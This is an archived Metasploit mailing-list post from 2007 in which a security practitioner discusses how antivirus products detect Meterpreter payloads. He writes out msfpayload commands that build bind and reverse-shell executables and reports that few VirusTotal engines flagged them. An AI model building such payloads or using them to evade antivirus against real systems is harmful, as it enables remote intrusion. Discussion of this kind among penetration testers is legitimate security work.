Metasploit mailing list archives
Connect to a remote windows host with valid credentials (no exploit)
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 1 Jun 2007 15:13:01 -0500
On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
- Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is launched (warning about "Buffer Overflow"); Kaspersky does a good job on this, I am positively surprised.
I made a meterpreter listener and reverse and uploaded them to virustotal.com: $ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10 used to complain, not sure what changed. :) If only a clean EXE would be created with a real exit() call or something. Having the debug handler kick in after doing a 'quit' really sucks. -- ..:[ grutz at jingojango dot net ]:.. GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4 "There's just no amusing way to say, 'I have a CISSP'." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 191 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070601/90163f50/attachment.pgp>
Current thread:
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Talha (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Nicolas FR (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Kurt Grutzmacher (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) Kurt Grutzmacher (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) mmiller at hick.org (Jun 01)
- Connect to a remote windows host with valid credentials (no exploit) H D Moore (Jun 01)